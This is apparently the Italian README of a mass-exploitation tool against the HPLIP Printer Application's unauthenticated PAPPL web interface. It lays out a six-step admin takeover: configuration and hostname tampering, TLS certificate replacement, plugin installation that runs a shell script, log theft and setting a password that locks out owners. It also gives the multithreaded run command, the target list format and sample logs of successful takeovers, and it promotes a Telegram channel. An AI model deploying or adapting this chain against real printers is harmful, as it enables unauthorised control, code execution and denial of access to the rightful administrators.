
HPLIP < 3.26.6 — Acquisizione completa dell'accesso amministrativo tramite l'interfaccia web PAPPL (nessuna autenticazione). Correlato a CVE-2026-91097 fino a CVE-2026-91106 (CVSS 9.3)
🔬 Unisciti a Telegram per le ultime ricerche sulle vulnerabilità e i rilasci di exploit
Strumento di sfruttamento di massa che prende di mira la HPLIP Printer Application (interfaccia web basata su PAPPL) in tutte le versioni di HPLIP precedenti alla 3.26.6. Lo strumento sfrutta lo stato predefinito non autenticato dell'interfaccia web PAPPL per eseguire una catena completa di acquisizione amministrativa: manomissione della configurazione, modifica dell'hostname, sostituzione del certificato TLS, installazione del plugin HP (che attiva l'esecuzione shell del file .run sul target), esfiltrazione dei log di sistema e blocco della password admin.
La vulnerabilità principale è l'Accesso Amministrativo Non Autenticato di PAPPL — la HPLIP Printer Application viene fornita con nessuna password configurata per impostazione predefinita, consentendo a qualsiasi attaccante di rete di eseguire tutte le azioni amministrative senza autenticazione tramite l'interfaccia web (tipicamente la porta 8000).
Inoltre, la catena di installazione del plugin sfrutta debolezze affrontate in:
| CVE | CWE | CVSS 4.0 | Rilevanza |
|---|---|---|---|
| CVE-2026-91097 | CWE-94 / CWE-787 | 7.0 | Path Traversal in plugin.spec — l'installazione del plugin attivata da questo strumento passa attraverso il codice vulnerabile di pluginhandler.py |
| CVE-2026-91102 | CWE-78 / CWE-494 | 8.4 | Download Senza Verifica di Integrità — il file .run del plugin viene scaricato via HTTP ed eseguito con sh sul target |
HP Security Bulletin: HPSBPI04151
| Endpoint | Azione | Verificato |
|---|---|---|
/security | Imposta la password admin (acquisizione account) | ✅ |
/config | Modifica nome DNS-SD, posizione, organizzazione, contatto | ✅ |
/network | Cambia l'hostname di sistema | ✅ |
/tls-install-crt | Carica certificato TLS arbitrario + chiave privata | ✅ |
/plugin | Attiva il download del plugin HP + accettazione licenza + installazione (esegue .run con sh) | ✅ |
/logfile.txt | Legge il file di log completo dell'applicazione (divulgazione di informazioni) | ✅ |
Target Discovery
│
▼
Detect HPLIP Printer Application (Server header + version)
│
▼
Check Authentication Status (/security)
│
├── Password Set ──► Log as VULN (locked)
│
└── No Password (default) ──► Exploit Chain:
│
├── 1. Modify Configuration (/config)
│ dns_sd_name, location, organization, contact_name
│ Verified: marker reflected in response
│
├── 2. Change Hostname (/network)
│ Old hostname captured, new hostname set
│ Verified: new value reflected in response
│
├── 3. Upload TLS Certificate (/tls-install-crt)
│ Custom PEM certificate + private key
│ Multipart file upload
│
├── 4. Install HP Plugin (/plugin)
│ Step 1: POST action=install-plugin (downloads .run)
│ Step 2: POST action=license-accepted (executes with sh)
│ ⚠ CVE-2026-91097 + CVE-2026-91102
│
├── 5. Read Log File (/logfile.txt)
│ System paths, environment info, Snap paths
│
└── 6. Set Admin Password (/security)
Locks out further unauthenticated access
Completes full admin takeover
pip install requests
Richiesto Python 3.8+. Nessun'altra dipendenza.
python T.py targets.txt 50
| Argomento | Descrizione | Predefinito |
|---|---|---|
targets.txt | File contenente la lista dei target (uno per riga) | Richiesto |
50 | Numero di thread concorrenti | 15 |
python T.py
Lo strumento richiederà il file della lista dei target e il numero di thread.
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
8000# vengono ignorate| File | Contenuto |
|---|---|
AdminS.txt | Acquisizione admin — password, versione del server, mappa completa degli URL del pannello |
Nx_modify.txt | Modifiche verificate di configurazione e hostname (valori vecchi → nuovi) |
Nx_upload.txt | Conferme di caricamento del certificato TLS |
Nx_plugin.txt | Risultati dell'installazione del plugin HP con stato di esecuzione shell |
Nx_recon.txt | Divulgazione di informazioni — dimensione del file di log, percorsi d'ambiente, versione |
AdminS.txthttp://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...
Nx_modify.txthttp://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
██████ ██ ██ ██
██ ███ ██ ██ ██
██ ██████ ███
██ █████ ██ ██
██ ████ ██ ██
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
HPLIP Printer Application │ Admin Takeover + Full Control
Affected < 3.26.6 │ PAPPL Unauthenticated Access
CVE-2026-91097 │ Plugin Path Traversal
CVE-2026-91102 │ Plugin Download Without Integrity + Shell Exec
Exploited via Web: /security /config /network /plugin /tls-install-crt /logs
By: Nxploited ( Khaled Alenazi ) │ Telegram: @Kxploit
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
targets=4 threads=4
00:11:34 [CUPS ] http://192.168.1.100:8000 Server: HPLIP_Printer_Application/3.22.10-13
00:11:34 [VER ] http://192.168.1.100:8000 v3.22.10 < 3.26.6 AFFECTED
00:11:35 [PROBE ] http://192.168.1.100:8000 v3.22.10 | NO AUTH | exploiting...
00:11:36 [CFG ] http://192.168.1.100:8000 CONFIG MODIFIED | marker=abc12345
00:11:37 [NET ] http://192.168.1.100:8000 HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
00:11:38 [CERT ] http://192.168.1.100:8000 TLS CERT UPLOADED | marker=abc12345
00:12:03 [PLG ] http://192.168.1.100:8000 PLUGIN | freshly_installed | shell_exec=True
00:12:05 [LOG ] http://192.168.1.100:8000 logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
00:12:05 [ADMIN ] http://192.168.1.100:8000 PASSWORD SET | pw=Nx-zD_buovl6wko0
00:12:05 [HIT ] http://192.168.1.100:8000 v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
DONE 4/4 █ HIT=4 █ VULN=0 █ SAFE=0 █ SKIP=0
▐ Admin Takeover: 4 └─ AdminS.txt
▐ Modifications : 8 └─ Nx_modify.txt
▐ Cert Uploads : 4 └─ Nx_upload.txt
▐ Plugin Exec : 1 └─ Nx_plugin.txt
▐ Recon / Info : 8 └─ Nx_recon.txt
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
| Tag | Significato |
|---|---|
HIT | Sfruttato con successo — acquisizione admin ottenuta |
VULN | Vulnerabile ma password già impostata (bloccato) |
SAFE | Versione ≥ 3.26.6 (corretta) |
SKIP | Non è una HPLIP Printer Application o non raggiungibile |
/var/snap/hplip-printer-app/common/sh plugin.run --keep --nox11 che esegue il binario ufficiale del plugin HP — il contenuto viene scaricato dai server HP; l'attaccante non controlla il contenuto del plugin ma ne attiva l'esecuzioneBy: Nxploited
Questo strumento è fornito esclusivamente per ricerca di sicurezza autorizzata, penetration testing e scopi educativi. L'uso di questo strumento contro sistemi senza esplicita autorizzazione scritta dal proprietario del sistema è illegale e non etico. L'autore non si assume alcuna responsabilità per qualsiasi uso improprio, danno o conseguenza legale derivante dall'uso di questo strumento. Ottenere sempre l'autorizzazione appropriata prima di condurre qualsiasi valutazione di sicurezza. Utilizzando questo strumento, accetti di essere l'unico responsabile delle tue azioni e della conformità a tutte le leggi e i regolamenti applicabili.